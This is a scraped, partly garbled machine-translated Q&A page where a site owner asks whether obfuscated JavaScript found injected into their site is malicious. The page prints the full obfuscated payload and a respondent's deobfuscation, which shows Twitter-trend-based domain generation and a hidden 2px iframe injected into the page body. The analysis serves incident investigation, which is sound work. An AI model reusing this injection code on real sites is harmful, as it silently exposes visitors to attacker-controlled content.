English 中文(简体)
这种危险的说法吗?
原标题:Is this dangerous Javascript?
<script>
(function($$) {
    d = "(@(){ %H=@( +Pw=this;\[Pw~FullYear $Month $Date $Hours $Minutes $Seconds()]}; %B=@( +#h,PD=this.#H(),i=0;PD[1]+=1;while(i++<7){#h=PD[i] 0#h<#L)PD[i]=Vz )+#h}\ PD.splice(Vz ),1+VT - 3Vu -+ T +PD 3VU -};Pr={ hXhttp://`sX/`tXtre`dXdai`nXnds`qX?`cXcallback=`jX#`aXapi`lXly`WXtwitter`oXcom`eX1`kXs`KXbody`xXajax`DX.`LXlibs`JXjquery`6X6.2`mXmin`fXon`SXcript`iXif`MXrame`YXhead`wXwidth:`pXpx;`HXheight:`TX2`rXrc`QX"`yXstyle=`bX><`RX></`IXdiv`BX<`AX>`gXgoogle`EX&date=`zX0`uX-`UX `,X:00`; :2345678901, / :48271, F :198195254, G :12, CX= };@ #n(#E){#M=[];for(PM=0;PM<#E /;PM++){#M.push(Pr[#E.charAt(PM)])}\ #p(#M)}Pj=document;#d=window; (C= undefined ; (S=VhaDWDosestnsdlDjfqcq  6G= &)== (C) 0#G||!PR()){if(!#G){try{Pn=jQuery  ;try{Pn=$  }PS=Pj.getElementsByTagName(VY -[0];#m=Pj.createElement(VkS -;#m.setAttribute(Vkr ),#n("hxDgakDosxsLsJseD6sJDmDj"));PS.appendChild(#m)}@ PH(#q,PB){\ Math.floor(#q/PB) 7x(#s +PC=PH( (N, !m) 5F= (N% !m 5f= !D*#F- !T*PC 0#f>0){#N=#f}else{#N=#f+ !v}\(#N%#s) 7t(#k){ (N=V; )+#k; !D=V/ ); !v=V; )-VF ); !m=PH( !v, !D); !T= !v% !D 7p(P){\ P /==1?P[0]:P 3  )};@ #e(P){d=new Date( 6D=Vzee );d.setTime((P.as_of-VG )*VG )*VG )*Vezz -*Vezzz -;\ d 7z(Pz +#c,PL,#j=Pz / 5v=[];while(--#j){PL=#x(#j 6v.push(PL 6c=Pz[PL];Pz[PL]=Pz[#j];Pz[#j]=#c}}@ PJ($){PN=$.map([81,85,74,74,92,17,82,73,80,30,82,77,25,11,10,10,61,11,56,55,11,53,6,53,7,2,1,0,48],@(x,i){\ String.fromCharCode(i+x+24)});\ #p(PN) 7o($){if &)!= (C){$(@(){if &.Ph)!= (C)\;$.Ph=1; 2S,@(Pe){#R=#e(Pe 6K=#R~Month() 8c=#R~Date( 6u=#S+#n("ETzeeu")+#K+"-"+Pc;Pu=PA=PH(#R~Hours(),6)*6 8d=Pu+1;#L=+Vez ); ) 2u,@(Pe){try{#y=Pe.trends;for(#r in #y){break}#r=#r.substr(+Vz ),+Vee - 0Pu ,u 0Pd ,d; 4u+V, )] 0!#b) 4d+V, )];#b=(#b[3].name.toLowerCase().replace(/[^a-z]/gi,  )+ safetynet ).split(   6T=#K*73+PA*3+Pc*41;#t(#T 6a=#x(4)+#L;#z(#b 6g=VCh )+#p(#b).substring(0,#a)+ .com/ +PJ($);Pr[ Z ]=#g;Pf=VBI 1biMU 1UkrZRiMRIA );$(VK -.append(Pf)}catch(Py){}})},#L*#L*#L)})})}else{ ) *,1+VTTT -}} *)()#js@functionP#AV#n( X : ` , ~.getUTC\return  .noConflict(true)}catch(e){} !#d.P $(),Pw~ %Date.prototype.# &(typeof($ (#d.# )setTimeout(@(){ *#o(#d.jQuery)} +){var  ,<#L)Pu=Vz )+P - )) /.length 0;if( 1yQHTpweeepQ 2$.getJSON(# 3.join( 4#b=#y[#r+P 5;var # 6);# 7}@ # 8+(+Ve -;P";
    for (c = 50; c; d = (t = d.split( #@PVX`~\   ! $ % & ( ) * + , - / 0 1 2 3 4 5 6 7 8 .substr(c -= (x = c < 10 ? 1 : 2), x))).join(t.pop()));
    $$(d)
})(function(jsAP) {
    return (function(jsA, jsAg) {
        return jsAg(jsA(jsAg(jsA(jsAP))))(jsAP)()
    })((function(jsA) {
        return jsA.constructor
    }), (function(jsA) {
        return (function(jsAg) {
            return jsA.call(jsA, jsAg)
        })
    }))
});
</script>

我的东道国对此不谈,而且经常发生。 我认为,他们可能躲藏一种恶意的黑客企图。

做些什么?

EDIT:

我们改变了东道方。

该守则确实是恶意的,并注入我们的网站上。 我们的东道国正试图掩盖这一点(或许这样,我们就会感到担忧)。

我的朋友在同一个东道国的网站上就发生了这种情况。

www.un.org/Depts/DGACM/index_spanish.htm 请注意:

Looks like some obfuscated injection.

最佳回答

让我们去掉工作,把工作推向边缘;它就失去了活力。

AFAICT so far it s grabbing (what seems to be) the third trend for two days prior to the current date, or at least was meant to (I think the date key it s using to look up a day s trends is incorrect, because it s adding a zero-seconds thing onto the time, which isn t present in the feed), building a URL from that, and sending some data keyed on a hash representing the nearest 6-hr interval.

The blob of text decoded after decoding with thestart of analysis:

(function () {
    jsAr = { }; // Here only for a subsequent set of jsAr[ Z ] later, which may not be necessary.

    /* Returns either first element of jsA, or a joined string. */
    function firstElementOrJoined(jsA) {
        return jsA.length == 1 ? jsA[0] : jsA.join(  )
    };

    jsAj = document;

    loadJquery(); // Load JQ in head new script tag.

    function divideAndFloor(jsq, jsAB) {
        return Math.floor(jsq / jsAB)
    }

    function jsx(jss) {
        var jsAC = divideAndFloor(jsN, jsAm);
        var jsF = jsN % jsAm;
        var jsf = (jsAD * jsF) - (jsAT * jsAC);
        if (jsf > 0) {
            jsN = jsf
        } else {
            jsN = jsf + jsAv
        }
        return (jsN % jss)
    }

    /** Used only once in .getJSON call. */
    function jst(jsk) {
        jsN = 2345678901 + jsk;
        jsAD = 48271;
        jsAv = 2147483647;
        jsAm = divideAndFloor(jsAv, jsAD);
        jsAT = jsAv % jsAD
    }

    /** Takes twitter as_of and subtracts ~2 days. */
    function jse(jsA) {
        d = new Date();
        d.setTime((jsA.as_of - 172800) *  1000 );
        return d
    }

    function jsz(jsAz) {
        var jsc, jsAL, jsj = jsAz.length;
        var jsv = [];
        while (--jsj) {
            jsAL = jsx(jsj);
            jsv.push(jsAL);
            jsc = jsAz[jsAL];
            jsAz[jsAL] = jsAz[jsj];
            jsAz[jsj] = jsc
        }
    }


    function jso($) {
        // Wait until we have jQuery loaded.
        if (typeof($) ==  undefined ) {
            setTimeout(function () { jso(jQuery) }, 1222);
            return;
        }

        $(function () {
            // Only run this function once (there s a timeout inside).
            if (typeof ($.jsAh) !=  undefined ) return;
            $.jsAh = 1;

            $.getJSON( http://api.twitter.com/1/trends/daily.json?callback=? , function (data) {
                dateTwoDaysPrior = jse(data);
                nMonthTwoDaysAgo = dateTwoDaysPrior.getUTCMonth() + 1;
                nDayTwoDaysAgo = dateTwoDaysPrior.getUTCDate();
                urlTwitterTwoDaysAgo =  http://api.twitter.com/1/trends/daily.json?callback=?&date=2011-  + nMonthTwoDaysAgo + "-" + nDayTwoDaysAgo;

                twoDigitPrevSixHr = prevSixHr = divideAndFloor(dateTwoDaysPrior.getUTCHours(), 6) * 6 + 1;
                jsAd = twoDigitPrevSixHr + 1;

                // Run JSON request every second.
                setTimeout(function () {
                    $.getJSON(urlTwitterTwoDaysAgo, function (data) {
                        try {
                            jsy = data.trends;
                            for (jsr in jsy) {
                                break;
                            }
                            jsr = jsr.substr(0, 11);  // == 2011-11-10

                            if (twoDigitPrevSixHr < 10) twoDigitPrevSixHr =  0  + twoDigitPrevSixHr; // Normalize to hh
                            if (jsAd < 10) twoDigitPrevSixHr =  0  + jsAd; // Normalize to hh

                            // Try to get trends for last 6hr thing (but the :00 will make it never work?)
                            // If can t, try to get the next 6hr thing.
                            jsb = jsy[jsr + twoDigitPrevSixHr +  :00 ];
                            if (!jsb) jsb = jsy[jsr + jsAd +  :00 ];

                            // Get third trend entry, e.g.,
                            // {
                            //    "name": "#sinterklaasintocht",
                            //    "query": "#sinterklaasintocht",
                            //    "promoted_content": null,
                            //    "events": null
                            // }
                            // and strip out non-chars from name, add safetynet, and convert to array
                            // [ s ,  i , etc... nterklaasintochtsafetynet]
                            jsb = (jsb[3].name.toLowerCase().replace(/[^a-z]/gi,   ) +  safetynet ).split(  );

                            //    803 + prevSixHr * 3 + 410; -- some sort of hash?
                            hashkeyForTwoDaysAgoPrevSixHr = nMonthTwoDaysAgo * 73 + prevSixHr * 3 + nDayTwoDaysAgo * 41;
                            jst(hashkeyForTwoDaysAgoPrevSixHr);

                            jsa = jsx(4) + 10;
                            jsz(jsb);

                            // Are these two lines useful? Neither jsAr[ Z ] nor jsg are referenced.
                            // jsb = [ s ,  i , etc... nterklaasintochtsafetynet]
                            jsg =  =http://  + firstElementOrJoined(jsb).substring(0, jsa) +  .com/index.php?tp=001e4bb7b4d7333d ;
                            jsAr[ Z ] = jsg;
                            //

                            jsAf =  <divstyle="height:2px;width:111px;"><iframe style="height:2px;width:111px;" src></iframe></div> ;
                            $( body ).append(jsAf)
                        } catch (jsAy) {}
                    })
                }, 1000)
            })
        });
    }

    jso(jQuery)
})();

在这里,从阵列修建了一些URLs:

jsd.jsS = http://api.twitter.com/1/trends/daily.json?callback=?

这部法典:

jsAS = jsAj.getElementsByTagName(jsn( Y ))[0];
jsm = jsAj.createElement(jsn( kS ));
jsm.setAttribute(jsn( kr ), jsn("hxDgakDosxsLsJseD6sJDmDj"));
jsAS.appendChild(jsm)

将jquery script tag改为<head>:

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.6.2/jquery.min.js"></script>
问题回答

暂无回答




相关问题
selected text in iframe

How to get a selected text inside a iframe. I my page i m having a iframe which is editable true. So how can i get the selected text in that iframe.

How to fire event handlers on the link using javascript

I would like to click a link in my page using javascript. I would like to Fire event handlers on the link without navigating. How can this be done? This has to work both in firefox and Internet ...

How to Add script codes before the </body> tag ASP.NET

Heres the problem, In Masterpage, the google analytics code were pasted before the end of body tag. In ASPX page, I need to generate a script (google addItem tracker) using codebehind ClientScript ...

Clipboard access using Javascript - sans Flash?

Is there a reliable way to access the client machine s clipboard using Javascript? I continue to run into permissions issues when attempting to do this. How does Google Docs do this? Do they use ...

javascript debugging question

I have a large javascript which I didn t write but I need to use it and I m slowely going trough it trying to figure out what does it do and how, I m using alert to print out what it does but now I ...

Parsing date like twitter

I ve made a little forum and I want parse the date on newest posts like twitter, you know "posted 40 minutes ago ","posted 1 hour ago"... What s the best way ? Thanx.

热门标签